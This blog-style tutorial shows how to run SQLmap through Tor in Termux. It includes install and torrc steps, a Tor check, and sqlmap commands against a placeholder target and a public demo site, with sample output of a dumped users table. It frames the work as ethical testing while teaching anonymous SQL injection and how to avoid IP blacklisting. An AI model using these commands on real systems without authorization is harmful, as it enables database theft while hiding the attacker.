They thought SQLmap with Tor was secure—until a misstep revealed everything. Don’t be them.
I’ll never forget the first time I ran a scan from my favorite FOSS toolkit late one night—heart pounding, coffee cold at my side—to uncover a hidden SQL vulnerability.
I hit “Enter,” watched the output scroll, and felt a surge of excitement…until I remembered: my real IP was plastered across the target’s logs.
That’s when I discovered SQLmap with Tor—the perfect open‑source alliance to cloak my reconnaissance in anonymity.
In this walkthrough, you’ll see exactly how to weave Tor’s onion‑routing magic into your SQLmap workflow, so you can test ethically without leaving a trace. Ready to stop worrying about your IP and start hacking responsibly?
Read on to master every step.
Download my FREE Termux Cheat Sheet Now!
⚠️ Important: These tools are intended for ethical hacking, security research, and education. Use them only on systems and networks you own or have permission to test. Unauthorized use can lead to serious legal consequences.
- Understanding the Tools: SQLmap and Tor, Explained
- How to Verify That SQLmap Is Using Tor Properly
- Why You Need Tor with SQLmap (Real-World Stakes)
- Installing SQLmap with Tor: What You Need Before You Begin
- Troubleshooting SQLmap with Tor
- Why Use SQLmap with Tor?
- Ethical Considerations
- Secure Your Recon, Empower Your Community
Understanding the Tools: SQLmap and Tor, Explained
Before we dive into terminal magic, let’s break this down:
- SQLmap is a powerful open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web apps.
- Tor (The Onion Router) routes your traffic through a network of volunteer-run nodes, anonymizing your IP address and making it harder to trace where requests are coming from.
When used together, they form a privacy-respecting combo for ethical hacking—helping FOSS developers and students test their own systems without exposing themselves or others unnecessarily. That’s not just smart security—it’s good practice in a world where surveillance is baked into the internet’s plumbing.
· · ─ ·𖥸· ─ · ·
How to Verify That SQLmap Is Using Tor Properly
Verify You’re Actually Anonymous: The Tor Test
You’ve set up proxychains, launched tor, and fired off SQLmap. Great. But how do you know it’s working?
Let’s verify it.
Run this command:
proxychains curl https://check.torproject.org/If everything is set up correctly, the output should say:
Congratulations. This browser is configured to use Tor.Congratulations. This browser is configured to use Tor.
Replace curl with sqlmap only after confirming this works. Without this sanity check, you’re flying blind—and possibly leaking your real IP. Consider this the FOSS version of “measure twice, cut once.”
Why You Need Tor with SQLmap (Real-World Stakes)
Why Your IP Matters: Real-World Risks of Skipping Tor
When SQLmap sends HTTP requests to a server, it does so directly unless routed through something like Tor. That means your actual IP address—your digital fingerprint—gets logged on the target system.
Even if you’re just testing your own application, this can expose your location, network identity, and in some cases, your employer or university. For anyone in a region where ethical hacking is misunderstood or penalized, that’s a dangerous leak.
Routing SQLmap through Tor isn’t just cool hacker aesthetic—it’s an essential step toward responsible, anonymous recon.
· · ─ ·𖥸· ─ · ·
Installing SQLmap with Tor: What You Need Before You Begin
Before you start scanning anything, it’s important to have your toolkit set up the right way. Getting SQLmap with Tor running smoothly isn’t just about installing a few packages—it’s about preparing your environment for secure, anonymized testing from the ground up. For beginners and FOSS learners, this means understanding the key components involved, what roles they play, and why each one matters. Think of it as laying the foundation for an ethical hacking lab where privacy and accountability go hand in hand. In this primer, we’ll walk through the essential pieces you’ll need before launching your first stealthy SQL injection test.
Prerequisites
To follow along, you need the following:
- Termux installed on your Android device
- SQLmap with Tor packages installed
- A basic understanding of SQL injection attacks
- Access to a test environment (refer to SQLmap’s official documentation for setup guidance)
- Familiarity with network scans using Nmap (read more)
Step 1: Install SQLmap and Tor in Termux
Update Termux packages:
pkg update && pkg upgrade -y Output:
Checking for available updates... Packages upgraded: 15This command ensures that Termux is up-to-date to prevent compatibility issues when setting up SQLmap with Tor.
Install SQLmap:
pkg install sqlmap -y Output:
SQLmap installed successfully. Version: 1.6. The -y flag automatically confirms prompts during installation.
Install Tor:
pkg install tor -y Output:
Tor installed successfully.Step 2: Configure the Tor Proxy
Edit the Tor configuration file:
nano /data/data/com.termux/files/usr/etc/tor/torrc Add the following lines:
SocksPort 9050 RunAsDaemon 1SocksPort 9050: Configures Tor to listen on port 9050 for proxy traffic.
RunAsDaemon 1: Runs Tor in the background for uninterrupted service.
Start Tor:
tor & Output:
Bootstrapped 100% (done): Done.Step 3: Test the Tor Network Connection
Confirm your connection to the Tor network using curl:
curl --socks5-hostname 127.0.0.1:9050 https://check.torproject.orgSample Output:
Congratulations.
This browser is configured to use Tor.
Your IP address appears to be: 185.220.101.1 If Tor is not working properly, restart it:
pkill tor && tor &
Step 4: Using SQLmap with Tor
Now let’s conduct anonymous SQL injection attacks with SQLmap with Tor. Run the following command:
sqlmap -u "http://targetsite.com/page?id=1" --tor --tor-type=SOCKS5 --tor-port=9050Sample Output:
[21:04:59] [INFO] Testing connection to the target URL
[21:04:59] [INFO] Target is vulnerable. SQL injection point: id=1
[21:05:01] [INFO] Dumping database contents...
Database: testdb
Table: users
id | username | password
1 | admin | admin123 -u: Specifies the target URL to test.--tor: Routes SQLmap traffic through the Tor network.--tor-type=SOCKS5: Configures the proxy type.--tor-port=9050: Specifies the Tor proxy port.
Step 5: Perform a Basic SQL Injection Test
To further test SQLmap with Tor, try the following on a demo website:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --tor --batchSample Output:
[21:15:12] [INFO] Testing SQL injection on parameter 'cat'
[21:15:12] [INFO] The parameter is vulnerable:
GET parameter 'cat' is injectable
[21:15:13] [INFO] Database: acuart
Table: products
product_id | product_name | price
1 | T-shirt | 9.99 The --batch flag ensures SQLmap answers all prompts automatically, which is useful when running tests without user input.
· · ─ ·𖥸· ─ · ·
Troubleshooting SQLmap with Tor
Connection Errors:
Restart Tor with:
pkill tor && tor &Tor Startup Issues:
Ensure no other service is using port 9050. Review your torrc configuration for syntax errors.
Why Use SQLmap with Tor?
- Avoid IP Blacklisting: Tor enables dynamic IP rotation, preventing target sites from blocking your real IP.
- Anonymity: Traffic routed through the Tor network ensures your identity remains concealed.
- Secure Pen Tests: Ethical hackers can protect their identity when conducting pentests (learn more about Nmap for scanning).
· · ─ ·𖥸· ─ · ·
Ethical Considerations
Using SQLmap with Tor can be very powerful, but you must act responsibly. Always conduct SQL injection attacks in legal, authorized environments. Unauthorized testing is both unethical and illegal. For more guidance, check the official SQLmap documentation.
· · ─ ·𖥸· ─ · ·
Secure Your Recon, Empower Your Community
By now you’ve seen how combining SQLmap with Tor transforms a basic injection test into an ethical, privacy‑preserving operation.
We covered setup, CLI configurations, and best practices to ensure your open‑source toolkit remains both powerful and responsible. Now it’s up to you: integrate these techniques into your FOSS projects, share them with your community, and elevate everyone’s security game.
Enjoyed this guide?
Join hundreds of fellow ethical hackers in my newsletter for more hands‑on tutorials, FOSS insights, and real‑world lessons—delivered straight to your inbox.
👉 Subscribe now and never miss a beat!
⚠️ Important: These tools are intended for ethical hacking, security research, and education. Use them only on systems and networks you own or have permission to test. Unauthorized use can lead to serious legal consequences.
Leave a Reply